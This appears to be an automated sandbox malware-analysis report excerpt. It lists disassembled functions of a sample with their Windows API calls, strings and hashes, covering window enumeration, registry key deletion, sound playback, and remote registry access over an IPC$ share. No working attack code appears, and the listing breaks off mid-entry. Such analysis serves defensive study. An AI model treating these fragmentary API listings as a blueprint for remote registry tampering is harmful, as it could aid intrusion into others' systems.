Part of subcall function 0079D63C: _free.LIBCMT ref: 0079D66B
Part of subcall function 0079D63C: _free.LIBCMT ref: 0079D67D
Part of subcall function 0079D63C: _free.LIBCMT ref: 0079D68F
Part of subcall function 0079D63C: _free.LIBCMT ref: 0079D6A1
Part of subcall function 0079D63C: _free.LIBCMT ref: 0079D6B3
Part of subcall function 0079D63C: _free.LIBCMT ref: 0079D6C5
Part of subcall function 0079D63C: _free.LIBCMT ref: 0079D6D7
Part of subcall function 0079D63C: _free.LIBCMT ref: 0079D6E9
Part of subcall function 0079D63C: _free.LIBCMT ref: 0079D6FB
Part of subcall function 0079D63C: _free.LIBCMT ref: 0079D70D
Part of subcall function 0079D63C: _free.LIBCMT ref: 0079D71F
Part of subcall function 0079D63C: _free.LIBCMT ref: 0079D731

_free.LIBCMT ref: 0079DA96

Part of subcall function 007929C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0079D7D1,00000000,00000000,00000000,00000000,?,0079D7F8,00000000,00000007,00000000,?,0079DBF5,00000000), ref: 007929DE
Part of subcall function 007929C8: GetLastError.KERNEL32(00000000,?,0079D7D1,00000000,00000000,00000000,00000000,?,0079D7F8,00000000,00000007,00000000,?,0079DBF5,00000000,00000000), ref: 007929F0

_free.LIBCMT ref: 0079DAB8
_free.LIBCMT ref: 0079DACD
_free.LIBCMT ref: 0079DAD8
_free.LIBCMT ref: 0079DAFA
_free.LIBCMT ref: 0079DB0D
_free.LIBCMT ref: 0079DB1B
_free.LIBCMT ref: 0079DB26
_free.LIBCMT ref: 0079DB5E
_free.LIBCMT ref: 0079DB65
_free.LIBCMT ref: 0079DB82
_free.LIBCMT ref: 0079DB9A

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 8b8e36dd604136b4cefebc853bc5151392a3852317a38da92e0a7232f3c9207e
Instruction ID: 695ca83db7fb38f09100ba9e2cc3575d935c9aaf82da4c81f362857f657ffdd8
Opcode Fuzzy Hash: 8b8e36dd604136b4cefebc853bc5151392a3852317a38da92e0a7232f3c9207e
Instruction Fuzzy Hash: 89315C71604604EFEF31AA79F849B5AB7E9FF10320F518419E448E71A2DA39BC918B60

Function 007C365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 007C369C
_wcslen.LIBCMT ref: 007C36A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 007C3797
GetClassNameW.USER32(?,?,00000400), ref: 007C380C
GetDlgCtrlID.USER32(?), ref: 007C385D
GetWindowRect.USER32(?,?), ref: 007C3882
GetParent.USER32(?), ref: 007C38A0
ScreenToClient.USER32(00000000), ref: 007C38A7
GetClassNameW.USER32(?,?,00000100), ref: 007C3921
GetWindowTextW.USER32(?,?,00000400), ref: 007C395D

Strings

%s%u, xrefs: 007C3734

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 29e02e6e9b3a3ef938ba65485f536a694c8328b6adf597fd7811ae6ebfa96630
Instruction ID: 279cc37da4390fa35a5f7236ee05c130aea7b16f91ec8e2492ac2f1c4b194471
Opcode Fuzzy Hash: 29e02e6e9b3a3ef938ba65485f536a694c8328b6adf597fd7811ae6ebfa96630
Instruction Fuzzy Hash: 3291AD71204606EFDB19DF24C885FAAB7A8FF44354F00C62DF999D2190DB38EA45CBA1

Function 007C4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 007C4994
GetWindowTextW.USER32(?,?,00000400), ref: 007C49DA
_wcslen.LIBCMT ref: 007C49EB
CharUpperBuffW.USER32(?,00000000), ref: 007C49F7
_wcsstr.LIBVCRUNTIME ref: 007C4A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 007C4A64
GetWindowTextW.USER32(?,?,00000400), ref: 007C4A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 007C4AE6
GetClassNameW.USER32(?,?,00000400), ref: 007C4B20
GetWindowRect.USER32(?,?), ref: 007C4B8B

Strings

ThumbnailClass, xrefs: 007C4A6F, 007C4AF1

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: a5ef0650318d38f0170b1707090442386a12ba9aac9c94c40fda226ca2520906
Instruction ID: 72213db0bc8b2b2b2e7dc3f8feae6c85dc6b3d120dd07b705fc48d9a65f8405c
Opcode Fuzzy Hash: a5ef0650318d38f0170b1707090442386a12ba9aac9c94c40fda226ca2520906
Instruction Fuzzy Hash: 8391BDB100820A9FDB15DF14C999FAA77E8FF84314F04846DFD869A096DB38ED45CBA1

Function 007F8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00779BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00779BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007F8D5A
GetFocus.USER32 ref: 007F8D6A
GetDlgCtrlID.USER32(00000000), ref: 007F8D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 007F8E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007F8ECF
GetMenuItemCount.USER32(?), ref: 007F8EEC
GetMenuItemID.USER32(?,00000000), ref: 007F8EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007F8F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007F8F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007F8FA1

Strings

0, xrefs: 007F8E9F

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: aab8943accc413dae51137a13f1d7d6dd2f03ae564036e5448b6b976fbd549be
Instruction ID: b14747b59efded2bd21e50c1f13e4491d8d753b676cd27e55e7204aa8644866e
Opcode Fuzzy Hash: aab8943accc413dae51137a13f1d7d6dd2f03ae564036e5448b6b976fbd549be
Instruction Fuzzy Hash: 7481AD715083099FDB50CF24C888ABB7BE9FF88754F144959FA9497391DB38D900CB62

Function 007CDC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 007CDC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 007CDC46
_wcslen.LIBCMT ref: 007CDC50
_wcsstr.LIBVCRUNTIME ref: 007CDCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 007CDCBC

Strings

DefaultLangCodepage, xrefs: 007CDD1F
%u.%u.%u.%u, xrefs: 007CDD9A
04090000, xrefs: 007CDCF2
StringFileInfo\, xrefs: 007CDC8F
\VarFileInfo\Translation, xrefs: 007CDCB4

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 6e27b139aa4cdcc5acdeff18f80652995763b0638201997d2d41280aa7d175dd
Instruction ID: e1c2f4a991774a9df6608ab91a3702dc09b61dc120d05234cdaf1772446a6c6a
Opcode Fuzzy Hash: 6e27b139aa4cdcc5acdeff18f80652995763b0638201997d2d41280aa7d175dd
Instruction Fuzzy Hash: A0411372A80205BADB21B6749D4BFBF37ACEF41750F10406EFA05A6182EB7C9D0197B5

Function 007ECC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 007ECC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 007ECC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 007ECD48

Part of subcall function 007ECC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 007ECCAA
Part of subcall function 007ECC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 007ECCBD
Part of subcall function 007ECC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007ECCCF
Part of subcall function 007ECC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 007ECD05
Part of subcall function 007ECC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 007ECD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 007ECCF3

Strings

RegDeleteKeyExW, xrefs: 007ECCC9
advapi32.dll, xrefs: 007ECCB8

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: eb2a78086889e77c9a6d0340c4a1567c96b699b7f0bcfb933ed6235375780d33
Instruction ID: dadbe4bcd94ec63fa69028a6fe0d26d88e815767212512ae30f0d5e05fc866f7
Opcode Fuzzy Hash: eb2a78086889e77c9a6d0340c4a1567c96b699b7f0bcfb933ed6235375780d33
Instruction Fuzzy Hash: 7031A175A0212CBBD722CB56DC88EFFBB7CEF09750F004065B905E2210DB388A46DAB4

Function 007CE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00769CB3: _wcslen.LIBCMT ref: 00769CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007CEA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007CEA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007CEA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007CEA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007CEAA7

Strings

play PlayMe wait, xrefs: 007CEA91
open , xrefs: 007CEA0C
play PlayMe, xrefs: 007CEAA2
close PlayMe, xrefs: 007CEA6E, 007CEA9B
alias PlayMe, xrefs: 007CEA36
status PlayMe mode, xrefs: 007CEA58

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: f8844f26a9c202d0db9e8f74eb1e2a1b227ec1e80e6a6f2740327ec25de36381
Instruction ID: 3a641068f4295aca0e474e9efc76e0fca20502e4d459bcc9f358a8d5aecd3e65
Opcode Fuzzy Hash: f8844f26a9c202d0db9e8f74eb1e2a1b227ec1e80e6a6f2740327ec25de36381
Instruction Fuzzy Hash: 98112431690269BED710A761ED4AEFF6B7CFBD1B00F40442D7811E21D1EE785995C9B0

Function 007C5CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 007C5CE2
GetWindowRect.USER32(00000000,?), ref: 007C5CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 007C5D59
GetDlgItem.USER32(?,00000002), ref: 007C5D69
GetWindowRect.USER32(00000000,?), ref: 007C5D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 007C5DCF
GetDlgItem.USER32(?,000003E9), ref: 007C5DDD
GetWindowRect.USER32(00000000,?), ref: 007C5DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 007C5E31
GetDlgItem.USER32(?,000003EA), ref: 007C5E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007C5E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 007C5E67

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 08566872d5c202ce485f2519e8fa6f1b0cc587669bc149d59c140aea7495abe6
Instruction ID: 3bc311f70ac9dba69760d3020fa0d2052b669e3fdb179282daf47e495bd4c650
Opcode Fuzzy Hash: 08566872d5c202ce485f2519e8fa6f1b0cc587669bc149d59c140aea7495abe6
Instruction Fuzzy Hash: BE510F71B00609AFDF18DF68DD89EAE7BB5EB48300F14812DF516E6290D775AE40CB60

Function 00778BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00778F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00778BE8,?,00000000,?,?,?,?,00778BBA,00000000,?), ref: 00778FC5

DestroyWindow.USER32(?), ref: 00778C81
KillTimer.USER32(00000000,?,?,?,?,00778BBA,00000000,?), ref: 00778D1B
DestroyAcceleratorTable.USER32(00000000), ref: 007B6973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00778BBA,00000000,?), ref: 007B69A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00778BBA,00000000,?), ref: 007B69B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00778BBA,00000000), ref: 007B69D4
DeleteObject.GDI32(00000000), ref: 007B69E6

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 75aa598958f31964c4e2f659410eda38383b411c5f13d8df1eaddee3789b6d03
Instruction ID: 441c9ba0119b6c5a7451cac648945930ea4e1169245cf7c794743a4aff8f529f
Opcode Fuzzy Hash: 75aa598958f31964c4e2f659410eda38383b411c5f13d8df1eaddee3789b6d03
Instruction Fuzzy Hash: 8F617B30102604DFCF629F14CA4CB65BBB1FB80752F14C96CE5469AA60CB7DA990CFA6

Function 00779838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00779944: GetWindowLongW.USER32(?,000000EB), ref: 00779952

GetSysColor.USER32(0000000F), ref: 00779862

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: cabb0abb3a129567ec4a5fb38ad21e233d2050512b3629d631e91817d37ea205
Instruction ID: d2c41ea0b606e3a3cf4f05de8fbcb612c883e34ff0d80673048c93d761734dec
Opcode Fuzzy Hash: cabb0abb3a129567ec4a5fb38ad21e233d2050512b3629d631e91817d37ea205
Instruction Fuzzy Hash: 0B41F4311057089FDF218F389C88BB93B65EB473B0F248645FAA68B2E1D3389C51DB11

Function 00798D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Strings

.x, xrefs: 0079903A, 00798FD0, 00798FF2

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID: .x
API String ID: 0-4151879616
Opcode ID: cf3ef319aa1dee5a175fa14344cce499e01cee8c9b49fdcc6b2dd34b97f62fab
Instruction ID: a65b63078e2387ffc244b2669ffcf313173616f9e49547a29134a2c4571d4702
Opcode Fuzzy Hash: cf3ef319aa1dee5a175fa14344cce499e01cee8c9b49fdcc6b2dd34b97f62fab
Instruction Fuzzy Hash: B8C1E475D0424AEFDF11EFACE845BADBBB0BF4A310F044059E524A7392DB389941CB61

Function 00778B06 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 007B6890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 007B68A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007B68B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 007B68D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007B68F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00778874,00000000,00000000,00000000,000000FF,00000000), ref: 007B6901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007B691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00778874,00000000,00000000,00000000,000000FF,00000000), ref: 007B692D

Strings

@U=u, xrefs: 007B68F2, 007B691E

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID: @U=u
API String ID: 1268354404-2594219639
Opcode ID: e41a2c1c79cbb6eff9d40b97e96622736f51d213d1fba6236ab0cd2f1dd33a4f
Instruction ID: dad544888e883891e044bef279f082f9bf77697f8991d6ec89283455aa7ecd4d
Opcode Fuzzy Hash: e41a2c1c79cbb6eff9d40b97e96622736f51d213d1fba6236ab0cd2f1dd33a4f
Instruction Fuzzy Hash: F9515CB0640209EFDF20CF25CC59FAA7BB5FB48750F108528FA5A972A0DB78E950DB50

Function 007C96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,007AF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 007C9717
LoadStringW.USER32(00000000,?,007AF7F8,00000001), ref: 007C9720

Part of subcall function 00769CB3: _wcslen.LIBCMT ref: 00769CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,007AF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 007C9742
LoadStringW.USER32(00000000,?,007AF7F8,00000001), ref: 007C9745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 007C9866

Strings

Error: , xrefs: 007C981D
%s (%d) : ==> %s: %s %s, xrefs: 007C984A
Line %d (File "%s"):, xrefs: 007C978F
^ ERROR, xrefs: 007C97FB
Line %d:, xrefs: 007C97A0

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 449be2fad0da12079c7f1d0e356af1ea7c04f0b8aef47a69eee6c6cb139226c2
Instruction ID: 0b837e2c587bdbcd15098e3389eeef780f1b2198877ce77955ea18d565ef0ba2
Opcode Fuzzy Hash: 449be2fad0da12079c7f1d0e356af1ea7c04f0b8aef47a69eee6c6cb139226c2
Instruction Fuzzy Hash: 87410F72800219EBDB05EBE0DE4AEEEB778AF55340F504069F60672191EA396F48CB61

Function 007C06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00766B57: _wcslen.LIBCMT ref: 00766B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007C07A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007C07BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007C07DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007C0804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 007C082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007C0837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007C083C

Strings

\IPC$, xrefs: 007C0784
\CLSID, xrefs: 007C0724
SOFTWARE\Classes\, xrefs: 007C070E

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

